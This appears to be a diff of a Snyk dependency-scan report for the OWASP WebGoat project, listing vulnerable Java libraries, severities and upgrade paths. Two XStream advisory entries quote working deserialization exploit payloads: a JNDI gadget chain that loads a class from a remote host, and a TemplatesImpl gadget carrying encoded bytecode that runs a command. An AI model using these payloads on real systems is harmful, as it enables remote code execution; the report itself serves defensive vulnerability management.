-          "description": "## Overview\n[ch.qos.logback:logback-classic](https://mvnrepository.com/artifact/ch.qos.logback/logback-classic) is a reliable, generic, fast and flexible logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `ch.qos.logback:logback-classic` to version 1.2.13, 1.3.12, 1.4.12 or higher.\n## References\n- [Changelog](https://logback.qos.ch/news.html#1.3.12)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/9c782b45be4abdafb7e17481e24e7354c2acd1eb)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b8eac23a9de9e05fb6d51160b3f46acd91af9731)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000002d-0000-4000-8000-00000000002d",
-          "locations": [
-            {
-              "package": {
-                "name": "ch.qos.logback:logback-classic",
-                "version": "1.4.11"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 80
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "0000002d-0000-4000-8000-00000000002d",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-classic",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.4.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000002d-0000-4000-8000-00000000002d",
-              "type": "fixes"
-            }
+        "ignores": [
+          {
+            "created_at": "2025-11-11T08:24:09.272Z",
+            "reason": "None Given",
+            "vuln_id": "SNYK-JAVA-ORGJRUBY-10557729"
+          },
+          {
+            "created_at": "2025-11-11T11:44:46.474Z",
+            "expires_at": "2026-12-12T00:00:00Z",
+            "reason": "False positive",
+            "vuln_id": "SNYK-JAVA-ORGAPACHETOMCATEMBED-13723930"
           }
-        },
-        "type": "findings"
+        ],
+        "severity_threshold": "none",
+        "suppress_pending_ignores": false
       },
+      "timeout": { "outcome": "fail", "seconds": 1200 }
+    },
+    "createdAt": "2025-11-19T14:40:18.666827Z",
+    "testSubject": {
+      "locator": { "paths": ["pom.xml"], "type": "local_path" },
+      "type": "dep_graph"
+    },
+    "subjectLocators": [
+      {
+        "project_id": "1ac6f03b-72e8-4824-94f6-cebbb133d213",
+        "type": "project_entity"
+      }
+    ],
+    "executionState": "finished",
+    "passFail": "fail",
+    "outcomeReason": "policy_breach",
+    "effectiveSummary": {
+      "count": 47,
+      "count_by": {
+        "result_type": {
+          "config": 0,
+          "dast": 0,
+          "other": 0,
+          "sast": 0,
+          "sca": 47
+        },
+        "severity": {
+          "critical": 0,
+          "high": 24,
+          "low": 0,
+          "medium": 23,
+          "none": 0,
+          "other": 0
+        }
+      }
+    },
+    "rawSummary": {
+      "count": 47,
+      "count_by": {
+        "result_type": {
+          "config": 0,
+          "dast": 0,
+          "other": 0,
+          "sast": 0,
+          "sca": 47
+        },
+        "severity": {
+          "critical": 0,
+          "high": 24,
+          "low": 0,
+          "medium": 23,
+          "none": 0,
+          "other": 0
+        }
+      }
+    },
+    "findingsComplete": true,
+    "metadata": {
+      "dependency-count": 163,
+      "display-target-file": "pom.xml",
+      "package-manager": "maven",
+      "project-name": "org.owasp.webgoat:webgoat",
+      "target-directory": "/Users/catalin.iuga/code/goofs/WebGoat"
+    },
+    "findings": [
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.19 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-43859.html)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n      \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n        \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n        \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n        \u003cbodyParts/\u003e\r\n        \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n          \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n          \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n            \u003csoapPart/\u003e\r\n            \u003cmm\u003e\r\n              \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                \u003caliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'\u003e\r\n                  \u003cchildren class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'\u003e\r\n                    \u003clist class='com.sun.xml.internal.dtdparser.SimpleHashtable'\u003e\r\n                      \u003ccurrent\u003e\r\n                        \u003chash\u003e1\u003c/hash\u003e\r\n                        \u003ckey class='javax.naming.Binding'\u003e\r\n                          \u003cname\u003eysomap\u003c/name\u003e\r\n                          \u003cisRel\u003efalse\u003c/isRel\u003e\r\n                            \u003cboundObj class='com.sun.jndi.ldap.LdapReferralContext'\u003e\r\n                              \u003crefCtx class='javax.naming.spi.ContinuationDirContext'\u003e\r\n                                \u003ccpe\u003e\r\n                                  \u003cstackTrace/\u003e\r\n                                  \u003csuppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'\u003e\r\n                                    \u003cc class='list'/\u003e\r\n                                    \u003clist reference='../c'/\u003e\r\n                                  \u003c/suppressedExceptions\u003e\r\n                                  \u003cresolvedObj class='javax.naming.Reference'\u003e\r\n                                    \u003cclassName\u003eEvilObj\u003c/className\u003e\r\n                                    \u003caddrs/\u003e\r\n                                    \u003cclassFactory\u003eEvilObj\u003c/classFactory\u003e\r\n                                    \u003cclassFactoryLocation\u003ehttp://127.0.0.1:1099/\u003c/classFactoryLocation\u003e\r\n                                  \u003c/resolvedObj\u003e\r\n                                  \u003caltName class='javax.naming.CompoundName' serialization='custom'\u003e\r\n                                    \u003cjavax.naming.CompoundName\u003e\r\n                                      \u003cproperties/\u003e\r\n                                      \u003cint\u003e1\u003c/int\u003e\r\n                                      \u003cstring\u003eysomap\u003c/string\u003e\r\n                                    \u003c/javax.naming.CompoundName\u003e\r\n                                  \u003c/altName\u003e\r\n                                \u003c/cpe\u003e\r\n                              \u003c/refCtx\u003e\r\n                              \u003cskipThisReferral\u003efalse\u003c/skipThisReferral\u003e\r\n                              \u003chopCount\u003e0\u003c/hopCount\u003e\r\n                            \u003c/boundObj\u003e\r\n                        \u003c/key\u003e\r\n                      \u003c/current\u003e\r\n                      \u003ccurrentBucket\u003e0\u003c/currentBucket\u003e\r\n                      \u003ccount\u003e0\u003c/count\u003e\r\n                      \u003cthreshold\u003e0\u003c/threshold\u003e\r\n                    \u003c/list\u003e\r\n                  \u003c/children\u003e\r\n                  \u003ccurrentReturned\u003etrue\u003c/currentReturned\u003e\r\n                  \u003ccurrentChildExpanded\u003efalse\u003c/currentChildExpanded\u003e\r\n                  \u003crootProcessed\u003etrue\u003c/rootProcessed\u003e\r\n                  \u003cscope\u003e2\u003c/scope\u003e\r\n                \u003c/aliases\u003e\r\n              \u003c/it\u003e\r\n            \u003c/mm\u003e\r\n          \u003c/multiPart\u003e\r\n        \u003c/sm\u003e\r\n      \u003c/message\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39148.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -13358,7 +105,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "0000002e-0000-4000-8000-00000000002e",
+          "key": "00000000-0000-0000-0000-000000000000",
           "locations": [
             {
               "package": {
@@ -13369,18 +116,110 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 138
-            }
-          },
-          "title": "Denial of Service (DoS)"
+          "problems": [
+            { "id": "CVE-2021-39148", "source": "cve" },
+            { "id": "CWE-434", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:01:41.106128Z",
+              "credits": ["wh1t3p1g"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:22.052886Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.810032Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:46.441358Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.350056Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:00:40Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.67811",
+                "probability": "0.00573"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:46.441358Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:25.013194Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39148.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "GHSA-qrx8-8545-4wg2", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "0000002e-0000-4000-8000-00000000002e",
+        "id": "00000000-0000-0000-0000-000000000000",
         "links": {},
         "relationships": {
           "fix": {
@@ -13394,11 +233,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.19"
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -13407,7 +246,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000002e-0000-4000-8000-00000000002e",
+              "id": "00000000-0000-0000-0000-000000000000",
               "type": "fixes"
             }
           }
@@ -13417,210 +256,380 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-webmvc](https://mvnrepository.com/artifact/org.springframework/spring-webmvc) is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.\n\nAffected versions of this package are vulnerable to Path Traversal through the functional web frameworks `WebMvc.fn` or `WebFlux.fn`. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible.\r\n\r\n**Note:**\r\nThis is similar to [CVE-2024-38816](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-webmvc` to version 6.1.14 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/fb7890d73975a3d9e0763e0926df2bd0a608e87e)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38819)\n- [PoC in GitHub](https://github.com/masa42/CVE-2024-38819-POC)\n",
+          "description": "Dual license: EPL-1.0, LGPL-2.1",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
+                  "name": "org.springframework.boot:spring-boot-starter-validation",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter-logging",
+                  "version": "3.5.6"
                 },
                 {
-                  "name": "org.springframework:spring-webmvc",
-                  "version": "6.0.13"
+                  "name": "ch.qos.logback:logback-classic",
+                  "version": "1.5.18"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000002f-0000-4000-8000-00000000002f",
+          "key": "00000000-0000-0000-0000-000000000001",
           "locations": [
             {
               "package": {
-                "name": "org.springframework:spring-webmvc",
-                "version": "6.0.13"
+                "name": "ch.qos.logback:logback-classic",
+                "version": "1.5.18"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 247
-            }
-          },
-          "title": "Path Traversal"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[0.9.18,)"],
+              "created_at": "2025-03-09T17:47:17.961Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "id": "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)",
+              "instructions": [],
+              "license": "(EPL-1.0 OR LGPL-2.1)",
+              "package_name": "ch.qos.logback:logback-classic",
+              "package_version": "",
+              "published_at": "2025-03-09T17:47:17.961Z",
+              "severity": "medium",
+              "source": "snyk_license"
+            }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": {},
+          "title": "Dual license: EPL-1.0, LGPL-2.1"
         },
-        "id": "0000002f-0000-4000-8000-00000000002f",
+        "id": "00000000-0000-0000-0000-000000000001",
         "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-webmvc",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.2.11"
-                        },
-                        {
-                          "name": "org.springframework:spring-webmvc",
-                          "version": "6.1.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000002f-0000-4000-8000-00000000002f",
-              "type": "fixes"
-            }
-          }
-        },
+        "relationships": {},
         "type": "findings"
       },
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='com.sun.java.util.jar.pack.PackageWriter$2'\u003e\r\n        \u003couter-class\u003e\r\n          \u003cverbose\u003e0\u003c/verbose\u003e\r\n          \u003ceffort\u003e0\u003c/effort\u003e\r\n          \u003coptDumpBands\u003efalse\u003c/optDumpBands\u003e\r\n          \u003coptDebugBands\u003efalse\u003c/optDebugBands\u003e\r\n          \u003coptVaryCodings\u003efalse\u003c/optVaryCodings\u003e\r\n          \u003coptBigStrings\u003efalse\u003c/optBigStrings\u003e\r\n          \u003cisReader\u003efalse\u003c/isReader\u003e\r\n          \u003cbandHeaderBytePos\u003e0\u003c/bandHeaderBytePos\u003e\r\n          \u003cbandHeaderBytePos0\u003e0\u003c/bandHeaderBytePos0\u003e\r\n          \u003carchiveOptions\u003e0\u003c/archiveOptions\u003e\r\n          \u003carchiveSize0\u003e0\u003c/archiveSize0\u003e\r\n          \u003carchiveSize1\u003e0\u003c/archiveSize1\u003e\r\n          \u003carchiveNextCount\u003e0\u003c/archiveNextCount\u003e\r\n          \u003cattrClassFileVersionMask\u003e0\u003c/attrClassFileVersionMask\u003e\r\n          \u003cattrIndexTable class='com.sun.javafx.fxml.BeanAdapter'\u003e\r\n            \u003cbean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'\u003e\r\n              \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n                \u003cdefault\u003e\r\n                  \u003c__name\u003ePwnr\u003c/__name\u003e\r\n                  \u003c__bytecodes\u003e\r\n                    \u003cbyte-array\u003eyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\u003c/byte-array\u003e\r\n                    \u003cbyte-array\u003eyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ\u003c/byte-array\u003e\r\n                  \u003c/__bytecodes\u003e\r\n                  \u003c__transletIndex\u003e-1\u003c/__transletIndex\u003e\r\n                  \u003c__indentNumber\u003e0\u003c",
